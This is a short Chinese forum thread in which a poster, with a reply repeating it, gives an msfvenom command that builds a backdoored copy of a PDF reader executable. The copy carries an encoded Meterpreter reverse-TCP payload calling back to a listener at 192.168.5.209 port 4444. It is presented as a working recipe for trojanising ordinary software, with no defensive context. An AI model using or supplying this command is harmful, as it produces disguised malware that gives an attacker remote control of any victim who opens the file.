admin 发表于 2017-12-16 17:43:00

在正常EXE文件中加入shell

利用msfvenom在正常的exe文件中植入后门Shell
后门漏洞和一个正常的exe文件
植入Shell:代码如下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x pdf阅读器.exe -e x86/33 -f exe -o backdoor.exe

priess 发表于 2017-12-16 18:01:09

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x pdf阅读器.exe -e x86/33 -f exe -o backdoor.exe
页: [1]
查看完整版本: 在正常EXE文件中加入shell